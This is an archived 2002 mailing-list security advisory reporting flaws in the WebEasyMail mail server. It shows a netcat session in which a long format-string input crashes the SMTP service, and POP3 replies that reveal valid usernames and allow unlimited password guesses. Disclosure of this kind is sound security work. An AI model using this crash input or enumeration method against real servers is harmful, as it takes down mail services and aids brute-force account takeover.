Advisory: DoS in WebEasyMail +more possible?

From: Stan Bubrouski (stanat_private)
Date: Mon Aug 19 2002 - 17:54:24 PDT

Next message: http-equivat_private: "killer k00kie [was Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0]"

Previous message: GreyMagic Software: "RE: Exploiting the Google toolbar (GM#001-MC)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Author: Stan Bubrouski
Date: August 19, 2002
Product: WebEasyMail
Versions Affected: 3.4.2.2 (Latest) + previous
Severity: Denial of Service on SMTP and POP3 portions
of the software.  It has not been investigated but
there might be a possibility of exploitation to
execute code remotely.


Problem #1:  The problem appears to lie in the SMTP
portion of WebEasyMail.  When you send specially
crafted format strings such as the printf family
of functions use, it is possible to cause the
service process to exit.  While no crash dialog
appears, the service is terminated without an
error message or such, and nothing appears in the
logs.

As an example:
$ nc localhost 25
220 ESMTP on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
%2
502 Error: command not implemented
%2s
502 Error: command not implemented
%100s
502 Error: command not implemented
%3000s
[emsrv.exe silently dies here]
$

I have had no time to debug this problem so I do not
know if it is exploitable.  The fact that it silently
exits may be an indication of internal error handling,
but it seems unlikely and I can't comment on it.


Problem #2: WebEasyMail's POP3 server appears to be
very weak in the prevent-brute-force attacks
department.  First off it allows for the discovery
of valid usernames by bugs in its output, for
example:

OK POP3 on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
user dog
+OK user accepted
pass dog
-ERR invalid username
user test
+OK user accepted
pass dog
-ERR wrong password for this user


Notice that when I wrong password is given, the
server responds with "-ERR invalid username" if
the user does not exist, and "-ERR wrong password for this user"
if the user does indeed exist.  Furthermore it
seems to allow an unlimited number of guesses of
usernames and passwords without disconnecting the
remote connection.  This coupled with the above
makes brute force attacks much much easier.

Vendor Status: I sent a message to the vendor of
WebEasyMail (supportat_private) twice, first
on August 2, 2002 and August 8, 2002 but recieved
no response.  As a result of the lack of response
or even acknowledgement my messages were recieved
this advisory has been released.

Next message: http-equivat_private: "killer k00kie [was Re: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0]"
Previous message: GreyMagic Software: "RE: Exploiting the Google toolbar (GM#001-MC)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 20 2002 - 08:06:08 PDT